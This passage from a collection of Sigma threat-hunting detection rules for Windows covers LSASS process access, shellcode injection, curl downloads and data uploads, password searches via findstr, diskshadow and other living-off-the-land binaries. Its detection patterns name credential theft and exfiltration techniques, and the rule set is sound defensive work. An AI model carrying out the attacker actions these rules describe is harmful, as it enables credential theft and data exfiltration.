filter2:\n        SourceImage|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n        SourceImage|endswith: '\\MsMpEng.exe'\n    # Microsoft Gaming Services\n    filter3:\n        SourceImage|startswith: 'C:\\Program Files\\WindowsApps\\'\n        SourceImage|endswith: '\\GamingServices.exe'\n    # Process Explorer\n    filter4:\n        SourceImage|endswith:\n            - '\\PROCEXP64.EXE'\n            - '\\PROCEXP.EXE'\n    # VMware Tools\n    filter5:\n        SourceImage|startswith: 'C:\\ProgramData\\VMware\\VMware Tools\\'\n        SourceImage|endswith: '\\vmtoolsd.exe'\n    # Antivirus and EDR agents\n    filter6:\n        SourceImage|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n        SourceImage|contains: 'Antivirus'\n    filter_nextron:\n        # SourceImage|startswith: 'C:\\Windows\\Temp\\asgard2-agent\\'  # Can be a manual THOR installation\n        SourceImage|endswith:\n            - '\\thor64.exe'\n            - '\\thor.exe'\n            - '\\aurora-agent-64.exe'\n            - '\\aurora-agent.exe'\n    filter_ms_products:\n        SourceImage|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\vs_bootstrapper_'\n        GrantedAccess: '0x1410'\n    # Generic Filter for 0x1410 filter (caused by so many programs like DropBox updates etc.)\n    filter_generic:\n        SourceImage|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\WINDOWS\\system32\\'\n    filter_wer:\n        SourceCommandLine: 'C:\\WINDOWS\\system32\\wermgr.exe -upload'\n    filter_localappdata:\n        SourceImage|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\'\n        SourceImage|endswith:\n            - '\\Microsoft VS Code\\Code.exe'\n            - '\\software_reporter_tool.exe'\n            - '\\DropboxUpdate.exe'\n            - '\\MBAMInstallerService.exe'\n            - '\\WebEx\\WebexHost.exe'\n            - '\\Programs\\Microsoft VS Code\\Code.exe'\n            - '\\JetBrains\\Toolbox\\bin\\jetbrains-toolbox.exe'\n    filter_xampp:\n        SourceImage|endswith: '\\xampp-control.exe'\n        GrantedAccess: '0x410'\n    filter_games:\n        SourceImage|contains: '\\SteamLibrary\\steamapps\\'\n        GrantedAccess:\n            - '0x410'\n            - '0x10'\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Legitimate software accessing LSASS process for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_access/proc_access_win_susp_potential_shellcode_injection.yml",
    "content": "title: Potential Shellcode Injection\nid: 250ae82f-736e-4844-a68b-0b5e8cc887da\nstatus: test\ndescription: Detects potential shellcode injection as used by tools such as Metasploit's migrate and Empire's psinject.\nreferences:\n    - https://github.com/EmpireProject/PSInject\nauthor: Bhabesh Raj\ndate: 2022-03-11\nmodified: 2024-07-02\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - detection.threat-hunting\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        GrantedAccess:\n            - '0x147a'\n            - '0x1f3fff'\n        CallTrace|contains: 'UNKNOWN'\n    filter_main_wmiprvse:\n        SourceImage: 'C:\\Windows\\System32\\Wbem\\Wmiprvse.exe'\n        TargetImage: 'C:\\Windows\\system32\\lsass.exe'\n    filter_optional_dell_folders:\n        # If dell software is installed we get matches like these\n        # Example 1:\n        #   SourceImage: C:\\Program Files\\Dell\\SupportAssistAgent\\bin\\SupportAssistAgent.exe\n        #   TargetImage: C:\\Program Files\\Dell\\TechHub\\Dell.TechHub.exe\n        #   GrantedAccess: 0x1F3FFF\n        # Example 2:\n        #   SourceImage: C:\\Program Files (x86)\\Dell\\UpdateService\\DCF\\Dell.DCF.UA.Bradbury.API.SubAgent.exe\n        #   TargetImage: C:\\Program Files\\Dell\\TechHub\\Dell.TechHub.exe\n        #   GrantedAccess: 0x1F3FFF\n        # Example 3:\n        #   SourceImage: C:\\Program Files\\Dell\\TechHub\\Dell.TechHub.exe\n        #   TargetImage: C:\\Program Files (x86)\\Dell\\UpdateService\\DCF\\Dell.DCF.UA.Bradbury.API.SubAgent.exe\n        #   GrantedAccess: 0x1F3FFF\n        SourceImage|startswith:\n            - 'C:\\Program Files\\Dell\\'\n            - 'C:\\Program Files (x86)\\Dell\\'\n        TargetImage|startswith:\n            - 'C:\\Program Files\\Dell\\'\n            - 'C:\\Program Files (x86)\\Dell\\'\n    filter_optional_dell_specifc:\n        SourceImage: 'C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe'\n        TargetImage: 'C:\\Windows\\Explorer.EXE'\n    filter_optional_visual_studio:\n        SourceImage|startswith: 'C:\\Program Files\\Microsoft Visual Studio\\'\n        TargetImage|startswith: 'C:\\Program Files\\Microsoft Visual Studio\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_7zip_password_extraction.yml",
    "content": "title: Password Protected Compressed File Extraction Via 7Zip\nid: b717b8fd-6467-4d7d-b3d3-27f9a463af77\nstatus: test\ndescription: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.\nreferences:\n    - https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-10\nmodified: 2024-07-16\ntags:\n    - attack.collection\n    - attack.t1560.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Description|contains: '7-Zip'\n        - Image|endswith:\n              - '\\7z.exe'\n              - '\\7zr.exe'\n              - '\\7za.exe'\n        - OriginalFileName:\n              - '7z.exe'\n              - '7za.exe'\n    selection_password:\n        CommandLine|contains|all:\n            - ' -p'\n            - ' x '\n            - ' -o'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate activity is expected since extracting files with a password can be common in some environments.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_attrib_system.yml",
    "content": "title: Set Files as System Files Using Attrib.EXE\nid: bb19e94c-59ae-4c15-8c12-c563d23fe52b\nrelated:\n    - id: efec536f-72e8-4656-8960-5e85d091345b\n      type: similar\nstatus: test\ndescription: Detects the execution of \"attrib\" with the \"+s\" flag to mark files as system files\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib\n    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib\n    - https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\nauthor: frack113\ndate: 2022-02-04\nmodified: 2023-03-14\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\attrib.exe'\n        - OriginalFileName: 'ATTRIB.EXE'\n    selection_cli:\n        CommandLine|contains: ' +s '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_boinc_execution.yml",
    "content": "title: Potential BOINC Software Execution (UC-Berkeley Signature)\nid: 0090b851-3543-42db-828c-02fee986ff0b\nstatus: test\ndescription: |\n    Detects the use of software that is related to the University of California, Berkeley via metadata information.\n    This indicates it may be related to BOINC software and can be used maliciously if unauthorized.\nreferences:\n    - https://boinc.berkeley.edu/\n    - https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\nauthor: Matt Anderson (Huntress)\ndate: 2024-07-23\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1553\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Description: 'University of California, Berkeley'\n    condition: selection\nfalsepositives:\n    - This software can be used for legitimate purposes when installed intentionally.\nlevel: informational\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_cmd_redirect.yml",
    "content": "title: CMD Shell Output Redirect\nid: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a\nrelated:\n    - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892\n      type: similar\nstatus: test\ndescription: |\n    Detects the use of the redirection character \">\" to redirect information on the command line.\n    This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as \"hostname\" and \"dir\" to files for future exfiltration.\nreferences:\n    - https://ss64.com/nt/syntax-redirection.html\nauthor: frack113\ndate: 2022-01-22\nmodified: 2024-03-19\ntags:\n    - attack.discovery\n    - attack.t1082\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd:\n        - OriginalFileName: 'Cmd.Exe'\n        - Image|endswith: '\\cmd.exe'\n    selection_cli:\n        CommandLine|contains: '>'\n    filter_optional_idm_extension:\n        CommandLine|contains:\n            - 'C:\\Program Files (x86)\\Internet Download Manager\\IDMMsgHost.exe'\n            - 'chrome-extension://'\n            - '\\\\.\\pipe\\chrome.nativeMessaging'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_cmd_set_prompt_abuse.yml",
    "content": "title: Potential File Override/Append Via SET Command\nid: 65e4c134-ee52-4099-9e35-5e17a4b45c62\nstatus: test\ndescription: |\n    Detects the use of the \"SET\" internal command of Cmd.EXE with the /p flag followed directly by an \"=\" sign.\n    Attackers used this technique along with an append redirection operator \">>\" in order to update the content of a file indirectly.\n    Ex: cmd /c >> example.txt set /p=\"test data\". This will append \"test data\" to the contents of \"example.txt\".\n    The typical use case of the \"set /p=\" command is to prompt the user for input.\nreferences:\n    - https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/set_1\n    - https://ss64.com/nt/set.html\nauthor: Nasreddine Bencherchali (Nextron Systems), MahirAli Khan (in/mahiralikhan)\ndate: 2024-08-22\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        CommandLine|contains:\n            - '/c set /p='\n            - '\"set /p='\n            - '>>*set /p=' # To catch edge cases where the attacker passes it via a \"cmd /c\"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the SET command with the \"/p\" flag for user prompting in administrative scripts or user-generated scripts.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_conhost_headless_execution.yml",
    "content": "title: Headless Process Launched Via Conhost.EXE\nid: 00ca75ab-d5ce-43be-b86c-55ff39c6abfc\nrelated:\n    - id: 056c7317-9a09-4bd4-9067-d051312752ea\n      type: derived\nstatus: test\ndescription: |\n    Detects the launch of a child process via \"conhost.exe\" with the \"--headless\" flag.\n    The \"--headless\" flag hides the windows from the user upon execution.\nreferences:\n    - https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\conhost.exe'\n        ParentCommandLine|contains: '--headless'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_csc_compilation.yml",
    "content": "title: Dynamic .NET Compilation Via Csc.EXE - Hunting\nid: acf2807c-805b-4042-aab9-f86b6ba9cb2b\nrelated:\n    - id: dcaa3f04-70c3-427a-80b4-b870d73c94c4\n      type: derived\nstatus: test\ndescription: Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.\nreferences:\n    - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/\n    - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf\n    - https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/\n    - https://twitter.com/gN3mes1s/status/1206874118282448897\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-02\ntags:\n    - attack.defense-evasion\n    - attack.t1027.004\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\csc.exe'\n        CommandLine|contains: '/noconfig /fullpaths @'\n    condition: selection\nfalsepositives:\n    - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_curl_download.yml",
    "content": "title: File Download Via Curl.EXE\nid: 9a517fca-4ba3-4629-9278-a68694697b81\nrelated:\n    - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution\n      type: derived\n    - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 # Suspicious curl execution\n      type: derived\nstatus: test\ndescription: Detects file download using curl.exe\nreferences:\n    - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-05\nmodified: 2023-02-21\ntags:\n    - attack.command-and-control\n    - attack.t1105\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - Product: 'The curl executable'\n    selection_remote:\n        CommandLine|contains:\n            - ' -O'  # covers the alias for --remote-name and --output\n            - '--remote-name'\n            - '--output'\n    condition: all of selection_*\nfalsepositives:\n    - Scripts created by developers and admins\n    - Administrative activity\n    - The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_curl_execution.yml",
    "content": "title: Curl.EXE Execution\nid: bbeaed61-1990-4773-bf57-b81dbad7db2d\nrelated:\n    - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 # Suspicious curl execution\n      type: derived\nstatus: test\ndescription: Detects a curl process start on Windows, which could indicate a file download from a remote location or a simple web request to a remote server\nreferences:\n    - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-05\nmodified: 2023-02-21\ntags:\n    - attack.command-and-control\n    - attack.t1105\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\curl.exe'\n        - Product: 'The curl executable'\n    condition: selection\nfalsepositives:\n    - Scripts created by developers and admins\n    - Administrative activity\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_curl_fileupload.yml",
    "content": "title: Potential Data Exfiltration Via Curl.EXE\nid: 00bca14a-df4e-4649-9054-3f2aa676bc04\nstatus: test\ndescription: Detects the execution of the \"curl\" process with \"upload\" flags, which might indicate potential data exfiltration\nreferences:\n    - https://twitter.com/d1r4c/status/1279042657508081664\n    - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file\n    - https://curl.se/docs/manpage.html\nauthor: Florian Roth (Nextron Systems), Cedric MAURUGEON (Update)\ndate: 2020-07-03\nmodified: 2023-05-02\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1105\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\curl.exe'\n        - Product: 'The curl executable'\n    selection_cli:\n        - CommandLine|contains:\n              - ' --form' # Also covers the \"--form-string\"\n              - ' --upload-file '\n              - ' --data '\n              - ' --data-' # For flags like: \"--data-ascii\", \"--data-binary\", \"--data-raw\", \"--data-urlencode\"\n        - CommandLine|re: '\\s-[FTd]\\s' # We use regex to ensure a case sensitive argument detection\n    filter_optional_localhost:\n        CommandLine|contains:\n            - '://localhost'\n            - '://127.0.0.1'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Scripts created by developers and admins\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_curl_useragent.yml",
    "content": "title: Curl.EXE Execution With Custom UserAgent\nid: 3286d37a-00fd-41c2-a624-a672dcd34e60\nstatus: test\ndescription: Detects execution of curl.exe with custom useragent options\nreferences:\n    - https://curl.se/docs/manpage.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd\nauthor: frack113\ndate: 2022-01-23\nmodified: 2023-02-21\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_curl:\n        - Image|endswith: '\\curl.exe'\n        - Product: 'The curl executable'\n    selection_opt:\n        CommandLine|contains:\n            - ' -A '\n            - ' --user-agent '\n    condition: all of selection_*\nfalsepositives:\n    - Scripts created by developers and admins\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_dfsvc_child_processes.yml",
    "content": "title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process\nid: 241d52b5-eee0-49d0-ac8a-8b9c15c7221c\nstatus: test\ndescription: Detects child processes of \"dfsvc\" which indicates a ClickOnce deployment execution.\nreferences:\n    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-12\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\dfsvc.exe'\n        Image|contains: '\\AppData\\Local\\Apps\\2.0\\' # ClickOnce application cache; an image path never ends with a backslash, so a contains match is required here\n    condition: selection\nfalsepositives:\n    - False positives are expected in environments leveraging ClickOnce deployments. An initial baselining is required before using this rule in production.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_diskshadow_child_process.yml",
    "content": "title: Diskshadow Child Process Spawned\nid: 56b1dde8-b274-435f-a73a-fb75eb81262a\nrelated:\n    - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location\n      type: similar\n    - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution\n      type: similar\n    - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE\n      type: similar\n    - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution\n      type: similar\nstatus: test\ndescription: Detects any child process spawning from \"Diskshadow.exe\". This could be due to executing Diskshadow in interpreter mode or script mode and using the \"exec\" flag to launch other applications.\nreferences:\n    - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow\nauthor: Harjot Singh @cyb3rjy0t\ndate: 2023-09-15\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\diskshadow.exe'\n    filter_main_werfault:\n        Image|endswith: ':\\Windows\\System32\\WerFault.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Likely from legitimate usage of Diskshadow in Interpreter mode.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_diskshadow_script_mode.yml",
    "content": "title: Diskshadow Script Mode Execution\nid: 0c2f8629-7129-4a8a-9897-7e0768f13ff2\nrelated:\n    - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location\n      type: similar\n    - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution\n      type: similar\n    - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE\n      type: similar\n    - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned\n      type: similar\nstatus: test\ndescription: |\n    Detects execution of \"Diskshadow.exe\" in script mode using the \"/s\" flag. Attackers often abuse \"diskshadow\" to execute scripts that delete the shadow copies on the system. Investigate the content of the scripts and their location.\nreferences:\n    - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow\nauthor: Ivan Dyachkov, oscd.community\ndate: 2020-10-07\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'diskshadow.exe'\n        - Image|endswith: '\\diskshadow.exe'\n    selection_cli:\n        CommandLine|contains|windash: '-s '\n    condition: all of selection_*\nfalsepositives:\n    - Likely from legitimate backup scripts\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_explorer_child_of_shell_process.yml",
    "content": "title: Potential Proxy Execution Via Explorer.EXE From Shell Process\nid: 9eb271b9-24ae-4cd4-9465-19cfc1047f3e\nstatus: test\ndescription: |\n    Detects the creation of a child \"explorer.exe\" process from a shell like process such as \"cmd.exe\" or \"powershell.exe\".\n    Attackers can use \"explorer.exe\" for evading defense mechanisms by proxying the execution through the latter.\n    While this is often a legitimate action, this rule can be used to hunt for anomalies.\n    The MuddyWater threat actor was seen using this technique.\nreferences:\n    - https://twitter.com/CyberRaiju/status/1273597319322058752\n    - https://app.any.run/tasks/9a8fd563-4c54-4d0a-9ad8-1fe08339cbc3/\nauthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative\ndate: 2020-10-05\nmodified: 2024-06-21\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith: '\\explorer.exe'\n        CommandLine|contains: 'explorer.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate explorer.exe run from a shell host like \"cmd.exe\" or \"powershell.exe\"\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_extexport_execution.yml",
    "content": "title: Potential DLL Sideloading Activity Via ExtExport.EXE\nid: fb0b815b-f5f6-4f50-970f-ffe21f253f7a\nstatus: test\ndescription: |\n    Detects the execution of \"Extexport.exe\", a utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa.\n    It can be abused as a tool to sideload any DLL. If a folder is provided on the command line it will load any DLL with one of the following names: \"mozcrt19.dll\", \"mozsqlite3.dll\", or \"sqlite.dll\".\n    Arbitrary DLLs can also be loaded if a specific number of flags is provided.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Extexport/\n    - https://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/\n    - https://www.microsoft.com/en-us/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/\n    - https://res.armor.com/resources/threat-intelligence/astaroth-banking-trojan/\n    - https://securelist.com/the-tetrade-brazilian-banking-malware/97779/\n    - https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-11-26\nmodified: 2024-08-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Extexport.exe'\n        - OriginalFileName: 'extexport.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_findstr_password_recon.yml",
    "content": "title: Potential Password Reconnaissance Via Findstr.EXE\nid: 1a0f6f16-2099-4753-9a02-43b6ac7a1fa5\nstatus: test\ndescription: Detects command line usage of \"findstr\" to search for the \"password\" keyword in a variety of different languages\nreferences:\n    - https://steflan-security.com/windows-privilege-escalation-credential-harvesting/\n    - https://adsecurity.org/?p=2288\nauthor: Josh Nickels\ndate: 2023-05-18\ntags:\n    - attack.credential-access\n    - attack.t1552.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\findstr.exe'\n        - OriginalFileName: 'FINDSTR.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - 'contraseña' # Spanish\n            - 'hasło' # Polish\n            - 'heslo' # Czech\n            - 'parola' # Italian\n            - 'passe' # French\n            - 'passw' # German, English\n            - 'senha' # Portuguese\n            - 'senord' # Swedish\n            - '密碼' # Chinese (Traditional)\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_iexpress_execution.yml",
    "content": "title: New Self Extracting Package Created Via IExpress.EXE\nid: c2b478fc-09bf-40b2-8768-ab3ec8d61c9a\nstatus: test\ndescription: |\n    Detects the \"iexpress.exe\" utility creating self-extracting packages.\n    Attackers were seen leveraging \"iexpress\" to compile packages on the fly via \".sed\" files.\n    Investigate the command line options provided to \"iexpress\" and in case of a \".sed\" file, check the contents and legitimacy of it.\nreferences:\n    - https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html\n    - https://en.wikipedia.org/wiki/IExpress\n    - https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/\n    - https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-02-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1_parent:\n        ParentImage|endswith: '\\iexpress.exe'\n    selection_1_img:\n        - Image|endswith: '\\makecab.exe'\n        - OriginalFileName: 'makecab.exe'\n    selection_2_img:\n        - Image|endswith: '\\iexpress.exe'\n        - OriginalFileName: 'IEXPRESS.exe'\n    selection_2_cli:\n        CommandLine|contains: ' /n '\n    condition: all of selection_1_* or all of selection_2_*\nfalsepositives:\n    - Administrators building packages using iexpress.exe\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_microsoft_workflow_compiler_execution.yml",
    "content": "title: Microsoft Workflow Compiler Execution\nid: 419dbf2b-8a9b-4bea-bf99-7544b050ec8d\nstatus: test\ndescription: |\n    Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.\nreferences:\n    - https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/\nauthor: Nik Seetharaman, frack113\ndate: 2019-01-16\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1127\n    - attack.t1218\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Microsoft.Workflow.Compiler.exe'\n        - OriginalFileName: 'Microsoft.Workflow.Compiler.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate MWC use (unlikely in modern enterprise environments)\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_mode_codepage_change.yml",
